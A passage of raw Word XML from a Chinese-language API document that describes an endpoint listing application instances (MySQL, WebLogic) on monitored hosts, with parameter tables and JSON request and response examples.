          <w:p w14:paraId="6CFAB8C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="698FDF8B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>公司id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7B58D193" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7301E80C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B300188" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BB78AE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7B200FDF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="196CF8CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>authToken</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0491A8D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63061352" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>授权token，由前端传入，必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="165EA6F9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="180DCB1C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>osType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6435B6A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BAC26EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1：</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>； 2：windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="43D571BB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48385395" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>appName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33EB4CA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64E86E1E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>应用名,范围:</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>MySQL,WebLogic</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E78DDEF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE71336" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>authToken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "1da285b0062c4b0ca56f24dfce25b7f8",  //授权token，由前端传入，必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,  //1：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>； 2：windows</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "MySQL"  //应用名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D8BBFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B08351" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id" : "5a18eaab3171a748ec593838",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmKind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : 1,    //范围类型，1：主机维度；2：业务组；0：全部主机</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "group" : null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>groupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : "76dc78d64e7b379a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : "MySQL",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>userName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : "admin",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "port" : 3306,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : "172.16.6.113",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : "172.16.6.113",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"id" : "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tagName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : "", //标签名</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tagColor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : "",  //标签颜色</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tagDesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" :"" ,  //标签描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : 1,  //操作系统</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>createTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : "2017-03-01",  //创建时间</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostCount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : 0,  //主机数量</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : [] //id列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remark": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "hostname": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localhost.localdomain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AAB349"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362"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="4694"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="62DB00F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6ACD0D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ED46900" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45CCF4E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="374B037E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06C15B3A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42D582D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1408F927" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ObjectId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4CD2306D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53D1C6B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmKind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31C09745" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44780E87" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>范围类型，1：主机维度；2：业务组；0：全部主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4EE88083" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3698A834" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1979AE3B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C1DD104" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="671F29CC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4896F762" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>groupName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="629D439D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4637D625" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="659B45A8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31936794" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EF964E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40A06DA6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="589FA47C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10CC1B65" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>appName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0143B19C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D015ED4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>应用名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="278B9557" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F761A99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>userName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70E7572A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7607E290" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5F4688AF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30ECFB28" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E6BEB20" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D27E9F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2128F64B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FF67C04" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E006226" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FC2043B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="60BB6A7C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B7D7130" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectinIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="566C2563" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DE336D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="442D7236" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10F10079" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08ABEB3E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
